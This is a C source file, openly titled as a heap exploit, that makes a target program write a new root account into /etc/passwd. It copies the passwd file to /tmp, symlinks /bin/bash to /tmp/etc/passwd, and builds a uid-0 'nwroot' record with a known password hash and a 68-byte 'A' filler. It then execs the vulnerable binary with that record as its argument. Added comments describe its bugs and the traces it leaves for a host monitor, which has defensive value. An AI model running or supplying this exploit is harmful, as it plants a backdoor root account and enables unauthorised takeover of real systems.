Heap Exploit for new root in /etc/passwd
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
#define PASS "/etc/passwd"
#define PASSBK "/tmp/passwd.bkup"
#define TMP "/tmp/etc"
#define TMP2 "/tmp/etc/passwd"
#define BIN "/bin/bash"
int main(int argc, char *argv[]) {
/*
 * Builds one passwd(5)-style record in `buf` and hands it to another
 * program as that program's single argument (the execl() at the end).
 * Before that it copies /etc/passwd to /tmp/passwd.bkup, creates /tmp/etc
 * and symlinks /bin/bash to /tmp/etc/passwd.
 *
 *   argv[1]  path of the program to exec
 *   argv[2]  string that program sees as its argv[0]
 *
 * Returns EXIT_FAILURE if /etc/passwd or /tmp/passwd.bkup cannot be
 * opened, calls exit(-1) on bad usage, and returns 0 only when execl()
 * itself fails (a successful exec never returns).
 *
 * Side effects a host-based monitor can key on: a copy of /etc/passwd
 * under /tmp, a /tmp/etc directory created with mode 0777 (before umask),
 * and a symlink /tmp/etc/passwd -> /bin/bash.
 */
FILE *fp1, *fp2;
register int key; /* one byte from fgetc(); 'register' is only a hint */
struct stat st = {0};
char buf[120], pbuf[120]; /* buf: the record; pbuf: filler for its 5th (gecos) field */
if(argc < 3) {
printf("Usage: %s <execute of binary> <name of your binary>\n", argv[0]);
printf("Example: %s ./main main", argv[0]);
exit(-1); /* exit status 255 on most systems */
}
/* Byte-for-byte copy of PASS to PASSBK. fputc() and fclose(fp2) are not
 * checked, so a short or failed write of the backup goes unnoticed. */
fp1 = fopen(PASS, "rb");
if(fp1 == NULL) {
fprintf(stderr, "Can't open source file\n");
return EXIT_FAILURE;
}
fp2 = fopen(PASSBK, "wb");
if(fp2 == NULL) {
fclose(fp1);
fprintf(stderr, "Can't open dest file\n");
return EXIT_FAILURE;
}
while((key=fgetc(fp1)) != EOF) {
fputc(key, fp2);
}
fclose(fp1);
fclose(fp2);
printf("Copied %s into %s\n", PASS, PASSBK);
/* stat() failing for any reason is treated as "does not exist"; the
 * mkdir() return value is ignored, so "created" may be printed even if
 * the directory was not made. */
if(stat(TMP, &st) == -1) {
mkdir(TMP, 0777);
printf("%s created\n", TMP);
} else {
printf("%s already exists\n", TMP);
}
/* A symlink failure (e.g. TMP2 already exists) is only reported; the
 * program carries on and still builds and passes the record below. */
if(symlink(BIN, TMP2) == -1) {
printf("Could not link %s to %s\n", BIN, TMP2);
} else {
printf("Linked %s to %s\n", BIN, TMP2);
}
// Creating new user called nwroot with password
// == password; perl -e 'print crypt("password", "XX"). "\n"'
/* Record layout: name:hash:uid:gid:gecos:home:shell, with uid and gid 0. */
strcpy(buf, "nwroot:XXq2wKiyI43A2:0:0:");
// 'A'*68
memset(pbuf, 'A', 68);
/* NOTE(review): this terminates buf[119], not pbuf. pbuf has no NUL after
 * its 68 initialized bytes, so the strcat(buf, pbuf) below reads
 * uninitialized stack memory and its length is not bounded (undefined
 * behavior). Only if the copy is exactly 68 bytes does the finished
 * record (25 + 68 + 22 = 115 bytes plus NUL) fit in buf's 120 bytes. */
buf[sizeof(pbuf) - 1] = '\0';
strcat(buf, pbuf);
strcat(buf, ":/root:/tmp/etc/passwd");
printf("\nCreating buffer: %s\n", buf);
printf("\nNew Root Login: nwroot\t\tPassword: password\n\n");
/* Replaces this process with argv[1]; buf is its only argument. The
 * trailing 0 is an int, not a null pointer, in this variadic call, which
 * is not portable. execl() returns only on failure, and that failure is
 * not reported before the return 0 below. */
execl(argv[1], argv[2], buf, 0);
return 0;
}